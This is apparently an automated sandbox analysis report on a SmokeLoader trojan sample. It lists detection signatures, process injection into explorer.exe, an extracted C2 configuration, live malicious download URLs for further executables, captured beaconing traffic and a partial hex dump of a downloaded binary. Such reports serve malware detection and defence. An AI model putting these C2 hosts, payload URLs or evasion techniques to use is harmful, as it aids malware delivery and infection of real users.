Play interactive tour

Edit tour

Windows Analysis Report UZ6FEqlix4

Overview

General Information

Sample Name:	UZ6FEqlix4 (renamed file extension from none to exe)
Analysis ID:	545931
MD5:	5e0ed8966761e70ee0b8dcd141aafb4c
SHA1:	933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
SHA256:	8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
Tags:	32exeSmokeLoadertrojan
Infos:
Most interesting Screenshot:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

UZ6FEqlix4.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\UZ6FEqlix4.exe" MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)

UZ6FEqlix4.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\UZ6FEqlix4.exe" MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

411F.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\411F.exe MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)

411F.exe (PID: 5956 cmdline: C:\Users\user\AppData\Local\Temp\411F.exe MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)

eveggtb (PID: 7080 cmdline: C:\Users\user\AppData\Roaming\eveggtb MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)

eveggtb (PID: 4720 cmdline: C:\Users\user\AppData\Roaming\eveggtb MD5: 5E0ED8966761E70EE0B8DCD141AAFB4C)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp

Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}

Multi AV Scanner detection for submitted file

Show sources

Source: UZ6FEqlix4.exe	Virustotal: Detection: 58%	Perma Link
Source: UZ6FEqlix4.exe	Metadefender: Detection: 20%	Perma Link
Source: UZ6FEqlix4.exe	ReversingLabs: Detection: 62%

Antivirus detection for URL or domain

Show sources

Source: http://unicupload.top/install5.exe	URL Reputation: Label: phishing
Source: http://privacytools-foryou-777.com/downloads/toolspab3.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: unicupload.top	Virustotal: Detection: 15%			Perma Link
Source: host-data-coin-11.com	Virustotal: Detection: 13%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\411F.exe	Metadefender: Detection: 20%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\411F.exe	ReversingLabs: Detection: 67%
Source: C:\Users\user\AppData\Roaming\eveggtb	Metadefender: Detection: 20%	Perma Link
Source: C:\Users\user\AppData\Roaming\eveggtb	ReversingLabs: Detection: 67%

Machine Learning detection for sample

Show sources

Source: UZ6FEqlix4.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\eveggtb	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Joe Sandbox ML: detected

Source: UZ6FEqlix4.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source:	Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source:	Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,		0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA,		0_2_0041AA72

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: infinity-cheats.com
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://host-data-coin-11.com/
Source: Malware configuration extractor	URLs: http://file-coin-host-12.com/

Source: Joe Sandbox View	ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

IP Address: 185.233.81.115 185.233.81.115

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:02 GMTContent-Type: application/x-msdos-programContent-Length: 339456Connection: closeLast-Modified: Tue, 28 Dec 2021 12:56:02 GMTETag: W/"52e00-5d43457ecb7e9"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 1b b4 65 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 b0 3d 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 93 13 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc eb 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4e ed 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 65 6a 65 76 75 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 7a 69 00 00 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yawyilmlp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oabgiwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hwrkvn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oskoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yhvtxw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kfdyfm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jealulibe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://axnxlm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mgnuugce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kctmodtvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lspsrkslr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://clunuonr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pebbfc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xkoocu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xpkuvjioi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nxjfh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ithwflphmf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com

Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
